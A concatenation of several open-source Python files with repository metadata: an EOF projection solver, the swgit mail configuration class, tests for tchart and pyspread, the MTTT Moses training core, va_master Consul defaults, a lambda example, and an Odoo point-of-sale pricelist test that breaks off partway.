*neofs*
Number of EOFs to project onto. Defaults to all EOFs.
*eofscaling*
Set the scaling of the EOFs that are projected
onto. The following values are accepted:
* *0* : Un-scaled EOFs (default).
* *1* : EOFs are divided by the square-root of their eigenvalue.
* *2* : EOFs are multiplied by the square-root of their
eigenvalue.
*weighted*
If *True* then the EOFs are weighted prior to projection. If
*False* then no weighting is applied. Defaults to *True*
(weighting is applied). Generally only the default setting
should be used.
*notime*
If *True*, indicates that the input fields have no time
dimension and should be treated as spatial data. If *False*
then the first dimension of each input field will be assumed
to be a time dimension. Defaults to *False* (a time
dimension is assumed).
"""
if len(fields) != self._ndatasets:
raise EofError("number of fields differ from original input")
# Handle keyword arguments manually. This works around an issue in
# Python where defined keyword arguments cannot follow a variable
# length regular argument list.
keywords = {"neofs": None, "eofscaling": 0, "weighted": True,
"notime": False}
for kwarg in kwargs.keys():
if kwarg not in keywords.keys():
raise EofEorror("invalid argument: %s" % kwarg)
neofs = kwargs.get("neofs", keywords["neofs"])
eofscaling = kwargs.get("eofscaling", keywords["eofscaling"])
weighted = kwargs.get("weighted", keywords["weighted"])
notime = kwargs.get("notime", keywords["notime"])
# Record shape information about the input fields.
multirecords = list()
multichannels = list()
multidtypes = list()
for iset, field in enumerate(fields):
if notime:
records = 0
shape = field.shape
else:
records = field.shape[0]
shape = field.shape[1:]
channels = np.product(shape)
if channels != self._multichannels[iset]:
raise EofError("spatial dimensions do not match original fields")
multirecords.append(records)
multichannels.append(channels)
multidtypes.append(field.dtype)
# Check that all fields have the same time dimension.
if not (np.array(multirecords) == multirecords[0]).all():
raise EofError("all datasets must have the same first dimension")
# Get the dtype that will be used for the data. This will be the
# 'highest' dtype of those passed.
dtype = sorted(multidtypes, reverse=True)[0]
# Form a full array to pass to the EOF solver consisting of all the
# combined flat inputs.
nt = multirecords[0]
ns = self._multichannels.sum()
outdims = filter(None, [nt, ns])
cfields = ma.empty(outdims, dtype=dtype)
for iset in xrange(self._ndatasets):
slicer = self._multislicers[iset]
channels = self._multichannels[iset]
dims = filter(None, [nt, channels])
cfields[..., slicer] = fields[iset].reshape(dims)
# Compute the projection using the EofSolver object.
pcs = self._solver.projectField(cfields, neofs=neofs,
eofscaling=eofscaling, weighted=weighted, notime=notime)
return pcs
if __name__ == "__main__":
pass
|
ajdawson/eof2
|
lib/eofmultisolve.py
|
Python
|
gpl-3.0
| 18,557
|
#!/usr/bin/env python
# Copyright (C) 2012 Andrea Valle
#
# This file is part of swgit.
#
# swgit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# swgit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with swgit. If not, see <http://www.gnu.org/licenses/>.
from Defines import *
from Utils import *
from ObjEnv import *
from ObjCfg import *
class ObjMailBase( ObjCfgMail ):
DEFAULT_MAIL_CFG = """\
#
# Inside this file user can provide sensible defaults for mail delivery
#
# Please run
# swgit --tutorial-mailcfg
# for more informations
#
#[%s]
#mailserver-sshuser =
#mailserver-sshaddr =
#from =
#to =
#to-1 =
#to-2 =
#cc =
#cc-1 =
#cc-2 =
#bcc =
#bcc-1 =
#bcc-2 =
#subject =
#body-header =
#body-footer =
#
#[%s]
#mailserver-sshuser =
#mailserver-sshaddr =
#from =
#to =
#to-1 =
#to-2 =
#cc =
#cc-1 =
#cc-2 =
#bcc =
#bcc-1 =
#bcc-2 =
#subject =
#body-header =
#body-footer =
""" % ( SWCFG_STABILIZE_SECT, SWCFG_MAIL_PUSH_SECT )
CMD_SEND_MAIL_TEMPL = "echo -e \"%s\" | /bin/mail \"%s\" -s \"%s\" %s %s %s"
def __init__( self, file, section ):
super(ObjMailBase, self ).__init__( file, section )
def dump( self ):
retstr = "\n"
if self.isValid_ == False:
retstr += "INVALID "
retstr += "Mail configuration for %s\n" % self.section_
retstr += super(ObjMailBase, self ).dump()
return retstr
def sanitize_message( self, mess ):
for clean in [ "'", '"' ]:
mess = mess.replace( clean, ' ' )
return mess
def get_all_body( self, body ):
allbody = self.sanitize_message( self.bodyH_ )
if self.bodyH_ != "":
allbody += "\n"
allbody += body
if self.bodyF_ != "":
allbody += "\n" + self.sanitize_message( self.bodyF_ )
return allbody
def get_cc_opt( self ):
cc_opt = ""
if self.cc_ != "":
cc_opt = " -c \"%s\" " % ( ",".join(self.cc_) )
return cc_opt
def get_bcc_opt( self ):
bcc_opt = ""
if self.bcc_ != "":
bcc_opt = " -b \"%s\" " % ( ",".join(self.bcc_) )
return bcc_opt
def get_from_opt( self ):
from_opt = ""
if self.from_ != "":
from_opt = " -- -f \"%s\" " % ( self.from_ )
return from_opt
def get_mail_cmd( self ):
if self.isValid_ == False:
return ""
cmd_send_mail = self.CMD_SEND_MAIL_TEMPL % \
( self.get_all_body( "BODY_HERE" ),
",".join(self.to_),
"SUBJECT_HERE",
self.get_cc_opt(),
self.get_bcc_opt(),
self.get_from_opt()
)
if self.sshaddr_ != "":
return "ssh %s@%s '%s'" % (self.sshuser_, self.sshaddr_, cmd_send_mail )
return cmd_send_mail
def sendmail( self, body, debug ):
if self.isValid_ == False:
return self.dump(), 1
cmd_send_mail = self.CMD_SEND_MAIL_TEMPL % \
( self.get_all_body( body ),
",".join(self.to_),
self.subj_,
self.get_cc_opt(),
self.get_bcc_opt(),
self.get_from_opt()
)
if self.sshaddr_ != "":
if debug == True:
return "%s@%s:\n%s" % (self.sshuser_, self.sshaddr_, cmd_send_mail ), 0
else:
return mySSHCommand_fast( cmd_send_mail, self.sshuser_, self.sshaddr_ )
else:
if debug == True:
return "localhost:\n%s" % ( cmd_send_mail ), 0
else:
return myCommand_fast( cmd_send_mail )
################
# STABILIZE MAIL #
################
class ObjMailStabilize( ObjMailBase ):
def __init__( self ):
super(ObjMailStabilize, self ).__init__( SWFILE_MAILCFG, SWCFG_STABILIZE_SECT )
self.load_cfg()
#############
# PUSH MAIL #
#############
class ObjMailPush( ObjMailBase ):
def __init__( self ):
super(ObjMailPush, self ).__init__( SWFILE_MAILCFG, SWCFG_MAIL_PUSH_SECT )
#override "to"
self.fields_mandatory_[1] = [self.set_to, self.get_to, "to" , SWCFG_MAIL_TO, GITCFG_USERMAIL ]
self.load_cfg()
def main():
for o in ( ObjMailStabilize, ObjMailPush ):
obj = o()
print "\n", '#'*10, o, '#'*10, "\n"
print obj.show_config_options()
print ""
print obj.dump()
print ""
print "Sending mail"
out, errCode = obj.sendmail( "body\nbody", debug = True )
print out
#out, errCode = obj.sendmail( "body\nbody", debug = False )
if __name__ == "__main__":
main()
|
andreav/swgit
|
core/ObjMail.py
|
Python
|
gpl-3.0
| 5,260
|
# -*- coding: UTF-8 -*-
# pylint: disable=misplaced-comparison-constant,redefined-outer-name,no-self-use
import pytest
from tchart.decorators import PaperDecorator
@pytest.mark.parametrize('lines,expected_lines', (
(
[
u'0',
],
[
u' .---. ',
u' / . \\ ',
u' |\\_/| |',
u' | | /|',
u' .-------- |',
u' / .-. 0 / ',
u'| |--\' ',
u'\\ | ',
u' \\ / ',
u' `---\' ',
],
),
(
[
u'orange kako banana',
u' kiwi ',
u'mango',
u'pulp',
],
[
u' .---. ',
u' / . \\ ',
u' |\\_/| |',
u' | | /|',
u' .-------------------------\' |',
u' / .-. orange kako banana |',
u'| / \\ kiwi |',
u'| |\\_. | mango |',
u'|\\| | /| pulp / ',
u'| |-------------------\' ',
u'\\ | ',
u' \\ / ',
u' `---\' ',
],
),
))
def test_decorate(lines, expected_lines):
decorator = PaperDecorator()
assert decorator.decorate(lines=lines) == expected_lines
|
andras-tim/tchart
|
tests/test_decorators_paper.py
|
Python
|
gpl-3.0
| 1,537
|
"""@brief MTTT's core commands, stems from the original version created using Gtk https://github.com/roxana-lafuente/MTTT"""
# !/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
#
# Machine Translation Training Tool
# Copyright (C) 2016 Roxana Lafuente <roxana.lafuente@gmail.com>
# Miguel Lemos <miguelemosreverte@gmail.com>
# Paula Estrella <pestrella@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
def install_and_import(package):
import importlib
try:
importlib.import_module(package)
except ImportError:
try:
import pip
except ImportError:
print "no pip"
os.system('python get_pip.py')
finally:
import pip
pip.main(['install', package])
finally:
globals()[package] = importlib.import_module(package)
#os is one of the modules that I know comes with 2.7, no questions asked.
import os
#these other ones I a am not so sure of. Thus the install function.
install_and_import("requests")
install_and_import("subprocess")
install_and_import("json")
install_and_import("sys")
install_and_import("time")
install_and_import("shutil")
install_and_import("urlparse")
install_and_import("itertools")
from commands import *
from files_processing import *
from constants import moses_dir_fn
from Ui_mosesDialog import MosesDialog
UI_INFO = """
<ui>
<menubar name='MenuBar'>
<menu action='VisualsMenu'>
<menu action='Visuals'>
<menuitem action='metro'/>
<menuitem action='paper'/>
<separator />
<menuitem action='lights_on_option'/>
</menu>
</menu>
</menubar>
</ui>
"""
class MTTTCore():
def __init__(self):
# Recognize OS
if os.name == 'posix': # Linux
self.is_linux, self.is_windows = True, False
elif os.name == 'nt': # Windows
self.is_linux, self.is_windows = False, True
else:
print "Unknown OS"
exit(1)
# Check Moses Config file.
self.moses_dir = ""
try:
f = open(moses_dir_fn, 'r')
self.moses_dir = f.read()
f.close()
except IOError, OSError:
# File does not exist.
self.moses_dir = self.get_moses_dir()
f = open(moses_dir_fn, 'w')
f.write(self.moses_dir)
f.close()
finally:
# File content is wrong
if not self.is_moses_dir_valid(self.moses_dir):
moses_dir = self.get_moses_dir()
f = open(moses_dir_fn, 'w')
f.write(self.moses_dir)
f.close()
self.saved_absolute_path = os.path.abspath("saved")
self.saved_relative_filepath = "./saved"
if not os.path.exists(self.saved_absolute_path):
os.makedirs(self.saved_absolute_path)
# Init
self.source_lang = None
self.target_lang = None
self.output_text= None
self.cwd = os.getcwd()
def is_moses_dir_valid(self, directory):
is_valid = True
if directory == "":
is_valid = False # Empty string
elif not os.path.exists(directory):
is_valid = False # Directory does not exist
else:
# Check if dir exists but does not contain moses installation
is_valid = self._check_moses_installation(directory)
return is_valid
def _check_moses_installation(self, directory):
# TODO: TRY catch OSError when permission denied!!
file_content = [f for f in os.listdir(directory)]
moses_files = ["/scripts/tokenizer/tokenizer.perl",
"/scripts/recaser/truecase.perl",
"/scripts/training/clean-corpus-n.perl",
"/bin/lmplz",
"/bin/build_binary",
"/scripts/training/train-model.perl",
"/bin/moses"
]
if self.is_windows:
moses_files = [f.replace("/", "\\")
for f in moses_files]
moses_files = [f + ".exe"
for f in moses_files
if "/bin" in f]
is_valid = True
for mfile in moses_files:
is_valid = is_valid and os.path.isfile(directory + mfile)
return is_valid
def get_moses_dir(self):
"""
Gets Moses directory.
"""
moses = MosesDialog()
self.moses_dir = moses.detect()
return self.moses_dir
def _prepare_corpus(self, output_text, source_lang, target_lang, st_train, tt_train, lm_text):
self.output_text = str(output_text)
self.source_lang = str(source_lang)
self.target_lang = str(target_lang)
self.lm_text = str(lm_text)
self.tt_train = str(tt_train)
self.st_train = str(st_train)
output_directory = adapt_path_for_cygwin(self.is_windows, self.output_text)
return_text = ""
if output_directory is not None:
# Change directory to the output_directory.
try:
os.chdir(self.output_text)
except:
# Output directory does not exist.
os.mkdir(self.output_text)
os.chdir(self.output_text)
cmds = []
# 1) Tokenization
# a) Target text
target_tok = generate_input_tok_fn(self.target_lang,
output_directory)
cmds.append(get_tokenize_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
self.target_lang,
adapt_path_for_cygwin(self.is_windows,self.tt_train),
target_tok))
# b) Source text
source_tok = generate_input_tok_fn(self.source_lang,
output_directory)
cmds.append(get_tokenize_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
self.source_lang,
adapt_path_for_cygwin(self.is_windows,self.st_train),
source_tok))
# c) Language model
lm_tok = generate_lm_tok_fn(output_directory)
cmds.append(get_tokenize_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
self.source_lang,
adapt_path_for_cygwin(self.is_windows,self.lm_text),
lm_tok))
# 2) Truecaser training
# a) Target text
cmds.append(get_truecaser_train_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
target_tok))
# b) Source text
cmds.append(get_truecaser_train_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
source_tok))
# c) Language model
cmds.append(get_truecaser_train_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
lm_tok))
# 3) Truecaser
input_true = output_directory + "/input.true"
# a) Target text
target_true = generate_input_true_fn(self.target_lang,
output_directory)
cmds.append(get_truecaser_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
target_tok,
target_true))
# b) Source text
source_true = generate_input_true_fn(self.source_lang,
output_directory)
cmds.append(get_truecaser_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
source_tok,
source_true))
# c) Language model
self.lm_true = lm_true = generate_lm_true_fn(output_directory)
cmds.append(get_truecaser_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
target_tok, lm_true))
# 4) Cleaner
# a) Target text
self.input_clean = input_clean = generate_input_clean_fn(output_directory)
self.source_clean = source_clean = input_true + "." + self.source_lang
self.target_clean = target_clean = input_true + "." + self.target_lang
cmds.append(get_cleaner_command(adapt_path_for_cygwin(self.is_windows, self.moses_dir),
self.source_lang,
self.target_lang,
input_true,
input_clean))
# Start threads
all_ok = True
for cmd in cmds:
#print cmd
return_text += cmd + "\n"
# all_ok = all_ok and (os.system(cmd) == 0)
proc = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)
all_ok = all_ok and (proc.wait() == 0)
# print "returncode:", proc.returncode, "\n\n\n"
out, err = proc.communicate()
if all_ok:
self.is_corpus_preparation_ready = True
else:
print "TODO: Pop up error message!!"
return return_text
def _train(self):
# print "==============================>", self.is_corpus_preparation_ready
if self.output_text is not None:
#print self.output_text
output_directory = adapt_path_for_cygwin(self.is_windows, self.output_text)
else:
return "ERR"
return_text = ""
if output_directory is not None and self.is_corpus_preparation_ready:
cmds = []
output = "Log:\n\n"
# Train the language model.
self.lm_arpa = generate_lm_fn(output_directory)
#print "out:", self.lm_arpa, "\n"
cmds.append(get_lmtrain_command(self.moses_dir,
self.target_lang,
self.lm_true,
self.lm_arpa))
# Binarize arpa
self.blm = generate_blm_fn(output_directory)
#print "binarized out:", self.blm, "\n"
cmds.append(get_blmtrain_command(self.moses_dir,
self.target_lang,
self.lm_arpa,
self.blm))
# Train the translation model.
out_file = generate_tm_fn(output_directory)
cmds.append(get_tmtrain_command(self.moses_dir,
self.source_lang,
self.target_lang,
self.blm,
self.input_clean,
output_directory))
# TODO!
# Binarize phase-table.gz
# Binarize reordering-table.wbe-msd-bidirectional-fe.gz
# Change PhraseDictionaryMemory to PhraseDictionaryCompact
# Set the path of the PhraseDictionary feature to point to $HOME/working/binarised-model/phrase-table.minphr
# Set the path of the LexicalReordering feature to point to $HOME/working/binarised-model/reordering-table
for cmd in cmds:
# use Popen for non-blocking
#print cmd
output += cmd
return_text += cmd + "\n"
proc = subprocess.Popen([cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
proc.wait()
(out, err) = proc.communicate()
if out != "":
output += out
elif err != "":
output += err
# Adding output from training.out
training = adapt_path_for_cygwin(self.is_windows, self.output_text) + "/training.out"
try:
with open(training, "r") as f:
output += "\n" + f.read()
except IOError:
output += "Error. Unsuccessful when attempting to create moses.ini"
# Set output to the output label.
else:
output = "ERROR: Please go to the first tab and complete the process."
return output
return return_text
def _machine_translation(self, mt_in, chooseModel):
mt_in = str(mt_in)
base=os.path.basename(mt_in)
#mt_out = os.path.dirname(mt_in) + os.path.splitext(base)[0] + "_translated" + os.path.splitext(base)[1]
mt_out = mt_in + ".translated"
in_file = adapt_path_for_cygwin(self.is_windows, mt_in)
out_file = adapt_path_for_cygwin(self.is_windows,mt_out)
#print "OUTDIR:::"+adapt_path_for_cygwin(self.is_windows, self.output_text) + "/train/model/moses.ini"
if chooseModel:
output_text = chooseModel
else:
output_text = adapt_path_for_cygwin(self.is_windows, self.output_text)
output = "Running decoder, please wait\n\n............\n\n"
# Run the decoder.
cmd = get_test_command(self.moses_dir,
adapt_path_for_cygwin(self.is_windows, output_text) + "/train/model/moses.ini",
in_file,
out_file) #---> explota si se elije choose model
# use Popen for non-blocking
#print "CMD MT:::::::"+cmd
proc = subprocess.Popen([cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
(out, err) = proc.communicate()
f = open(out_file, 'r')
mt_result = f.read()
if mt_result == "":
if out != "":
output += out
elif err != "":
output += err
else:
output += "Best translation: " + mt_result
f.close()
return output
|
PaulaEstrella/MTTT-PyQT
|
MTTTCore.py
|
Python
|
gpl-3.0
| 15,580
|
initial_consul_data = {
"update" : {
"providers/va_standalone_servers" : {"username": "admin", "servers": [], "sec_groups": [], "images": [], "password": "admin", "ip_address": "127.0.0.1", "networks": [], "sizes": [], "driver_name": "generic_driver", "location": "", "defaults": {}, "provider_name": "va_standalone_servers"},
"users" : [],
},
"overwrite" : {
"va_flavours" : {"va-small": {"num_cpus": 1, "max_memory": 1048576, "vol_capacity": 5, "memory": 1048576}, "debian": {"num_cpus": 1, "max_memory": 1048576, "vol_capacity": 5, "memory": 1048576}},
"service_presets/highstate_preset":{"name": "highstate", "script": "salt {server} state.highstate test=True | perl -lne 's\/^Failed:\\s+\/\/ or next; s\/\\s.*\/\/; print'"},
"service_presets/ping_preset":{"name": "ping_preset", "script" : "ping -c1 {address} > /dev/null", "interval": "30s", "timeout": "10s"},
"service_presets/tcp_preset":{"name": "TCP", "tcp": "{address}", "interval": "30s", "timeout": "10s"},
"managed_actions/ssh/root" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
# {'name' : 'delete', 'type' : 'confirm'},
{'name' : 'remove_server', 'type' : 'confirm', 'kwargs' : ['datastore_handler', 'server_name'], 'requires_ssh' : False},
{'name' : 'stop', 'type' : 'confirm'},
{'name' : 'show_processes', 'type' : 'text', 'label' : 'Show processes'},
{'name' : 'show_usage', 'type' : 'text', 'label' : 'Show usage'},
{'name' : 'get_users', 'type' : 'text', 'label' : 'Get users'},
{'name' : 'restart_service', 'type' : 'form', 'label' : 'Restart service'}
]
},
"managed_actions/ssh/user" : { #Temporarily, we have all functions avialable for non-root users but we may change this in the future.
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'remove_server', 'type' : 'confirm', 'kwargs' : ['datastore_handler', 'server_name'], 'requires_ssh' : False},
{'name' : 'stop', 'type' : 'action'},
{'name' : 'show_processes', 'type' : 'text', 'label' : 'Show processes'},
{'name' : 'show_usage', 'type' : 'text', 'label' : 'Show usage'},
{'name' : 'get_users', 'type' : 'text', 'label' : 'Get users'},
{'name' : 'restart_service', 'type' : 'form', 'label' : 'Restart process'}
]
},
"managed_actions/winexe/administrator" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
]
},
"managed_actions/winexe/user" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/provider/openstack" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/provider/aws" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/provider/lxc" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/provider/digital_ocean" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/provider/libvirt" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/provider/century_link_driver" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/provider/generic_driver" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'start', 'type' : 'action'},
{'name' : 'stop', 'type' : 'action'}
],
},
"managed_actions/salt/" : {
"actions" : [
{'name' : 'reboot', 'type' : 'confirm'},
{'name' : 'delete', 'type' : 'confirm'},
{'name' : 'stop', 'type' : 'action'}
],
}
}
}
|
VapourApps/va_master
|
va_master/consul_kv/initial_consul_data.py
|
Python
|
gpl-3.0
| 5,705
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright Martin Manns
# Distributed under the terms of the GNU General Public License
# --------------------------------------------------------------------
# pyspread is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pyspread is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyspread. If not, see <http://www.gnu.org/licenses/>.
# --------------------------------------------------------------------
"""
testlib.py
==========
Helper functions for unit tests
"""
from copy import deepcopy
import wx
from src.lib.undo import stack as undo_stack
# Standard grid values for initial filling
grid_values = { \
(0, 0, 0): "'Test'",
(999, 0, 0): "1",
(999, 99, 0): "$^%&$^",
(0, 1, 0): "1",
(0, 2, 0): "2",
(1, 1, 0): "3",
(1, 2, 0): "4",
(1, 2, 2): "78",
}
# Helper methods for efficient testing
def _fill_grid(grid, values):
"""Fills grid with values (use e. g. grid_values)"""
for key in values:
grid.code_array[key] = values[key]
def restore_basic_grid(grid):
"""Restores basic, filled grid"""
default_test_shape = (1000, 100, 3)
grid.actions.clear(default_test_shape)
_fill_grid(grid, grid_values)
def basic_setup_test(grid, func, test_key, test_val, *args, **kwargs):
"""Sets up basic test env, runs func and tests test_key in grid"""
restore_basic_grid(grid)
func(*args, **kwargs)
grid.code_array.result_cache.clear()
assert grid.code_array(test_key) == test_val
def params(funcarglist):
"""Test function parameter decorator
Provides arguments based on the dict funcarglist.
"""
def wrapper(function):
function.funcarglist = funcarglist
return function
return wrapper
def pytest_generate_tests(metafunc):
"""Enables params to work in py.test environment"""
for funcargs in getattr(metafunc.function, 'funcarglist', ()):
metafunc.addcall(funcargs=funcargs)
def undo_test(grid):
"""Tests if the model is identical after an undo and a redo"""
code_array = deepcopy(grid.code_array)
undo_stack().undo()
undo_stack().redo()
assert code_array.dict_grid == grid.code_array.dict_grid
assert code_array == grid.code_array
def undotest_model(function):
"""Tests if the model is identical after an undo and a redo
The wrapped function's self must be the code_array or the data_array.
This function should be used nfor unit tests from within model.py
"""
def wrapper(self, *args, **kwargs):
function(self, *args, **kwargs)
code_array = deepcopy(self.data_array)
undo_stack().undo()
undo_stack().redo()
assert code_array == self.data_array
return wrapper
|
mgunyho/pyspread
|
pyspread/src/lib/testlib.py
|
Python
|
gpl-3.0
| 3,203
|
from math import log
def make_logarithmic_function(base):
return lambda x: log(x, base)
My_LF = make_logarithmic_function(3)
print(My_LF(9))
|
jinzekid/codehub
|
python/数据分析/func_lambda_test.py
|
Python
|
gpl-3.0
| 150
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.api import Environment
from odoo.tools import DEFAULT_SERVER_DATE_FORMAT
from datetime import date, timedelta
import odoo.tests
class TestUi(odoo.tests.HttpCase):
def test_01_pos_basic_order(self):
env = self.env(user=self.env.ref('base.user_admin'))
journal_obj = env['account.journal']
account_obj = env['account.account']
main_company = env.ref('base.main_company')
main_pos_config = env.ref('point_of_sale.pos_config_main')
account_receivable = account_obj.create({'code': 'X1012',
'name': 'Account Receivable - Test',
'user_type_id': env.ref('account.data_account_type_receivable').id,
'reconcile': True})
field = env['ir.model.fields']._get('res.partner', 'property_account_receivable_id')
env['ir.property'].create({'name': 'property_account_receivable_id',
'company_id': main_company.id,
'fields_id': field.id,
'value': 'account.account,' + str(account_receivable.id)})
# test an extra price on an attribute
pear = env.ref('point_of_sale.whiteboard')
attribute_value = env['product.attribute.value'].create({
'name': 'add 2',
'attribute_id': env['product.attribute'].create({
'name': 'add 2',
}).id,
})
env['product.template.attribute.value'].create({
'product_tmpl_id': pear.product_tmpl_id.id,
'price_extra': 2,
'product_attribute_value_id': attribute_value.id,
})
fixed_pricelist = env['product.pricelist'].create({
'name': 'Fixed',
'item_ids': [(0, 0, {
'compute_price': 'fixed',
'fixed_price': 1,
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 2,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.wall_shelf').id,
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 13.95, # test for issues like in 7f260ab517ebde634fc274e928eb062463f0d88f
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.small_shelf').id,
})],
})
env['product.pricelist'].create({
'name': 'Percentage',
'item_ids': [(0, 0, {
'compute_price': 'percentage',
'percent_price': 100,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.wall_shelf').id,
}), (0, 0, {
'compute_price': 'percentage',
'percent_price': 99,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.small_shelf').id,
}), (0, 0, {
'compute_price': 'percentage',
'percent_price': 0,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.magnetic_board').id,
})],
})
env['product.pricelist'].create({
'name': 'Formula',
'item_ids': [(0, 0, {
'compute_price': 'formula',
'price_discount': 6,
'price_surcharge': 5,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.wall_shelf').id,
}), (0, 0, {
# .99 prices
'compute_price': 'formula',
'price_surcharge': -0.01,
'price_round': 1,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.small_shelf').id,
}), (0, 0, {
'compute_price': 'formula',
'price_min_margin': 10,
'price_max_margin': 100,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.magnetic_board').id,
}), (0, 0, {
'compute_price': 'formula',
'price_surcharge': 10,
'price_max_margin': 5,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.monitor_stand').id,
}), (0, 0, {
'compute_price': 'formula',
'price_discount': -100,
'price_min_margin': 5,
'price_max_margin': 20,
'applied_on': '0_product_variant',
'product_id': env.ref('point_of_sale.desk_pad').id,
})],
})
env['product.pricelist'].create({
'name': 'min_quantity ordering',
'item_ids': [(0, 0, {
'compute_price': 'fixed',
'fixed_price': 1,
'applied_on': '0_product_variant',
'min_quantity': 2,
'product_id': env.ref('point_of_sale.wall_shelf').id,
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 2,
'applied_on': '0_product_variant',
'min_quantity': 1,
'product_id': env.ref('point_of_sale.wall_shelf').id,
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 2,
'applied_on': '0_product_variant',
'min_quantity': 2,
'product_id': env.ref('point_of_sale.product_product_consumable').id,
})],
})
env['product.pricelist'].create({
'name': 'Product template',
'item_ids': [(0, 0, {
'compute_price': 'fixed',
'fixed_price': 1,
'applied_on': '1_product',
'product_tmpl_id': env.ref('point_of_sale.wall_shelf_product_template').id,
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 2,
})],
})
env['product.pricelist'].create({
# no category has precedence over category
'name': 'Category vs no category',
'item_ids': [(0, 0, {
'compute_price': 'fixed',
'fixed_price': 1,
'applied_on': '2_product_category',
'categ_id': env.ref('product.product_category_3').id, # All / Saleable / Services
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 2,
})],
})
p = env['product.pricelist'].create({
'name': 'Category',
'item_ids': [(0, 0, {
'compute_price': 'fixed',
'fixed_price': 2,
'applied_on': '2_product_category',
'categ_id': env.ref('product.product_category_all').id,
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 1,
'applied_on': '2_product_category',
'categ_id': env.ref('product.product_category_3').id, # All / Saleable / Services
})],
})
today = date.today()
one_week_ago = today - timedelta(weeks=1)
two_weeks_ago = today - timedelta(weeks=2)
one_week_from_now = today + timedelta(weeks=1)
two_weeks_from_now = today + timedelta(weeks=2)
public_pricelist = env['product.pricelist'].create({
'name': 'Public Pricelist',
})
env['product.pricelist'].create({
'name': 'Dates',
'item_ids': [(0, 0, {
'compute_price': 'fixed',
'fixed_price': 1,
'date_start': two_weeks_ago.strftime(DEFAULT_SERVER_DATE_FORMAT),
'date_end': one_week_ago.strftime(DEFAULT_SERVER_DATE_FORMAT),
}), (0, 0, {
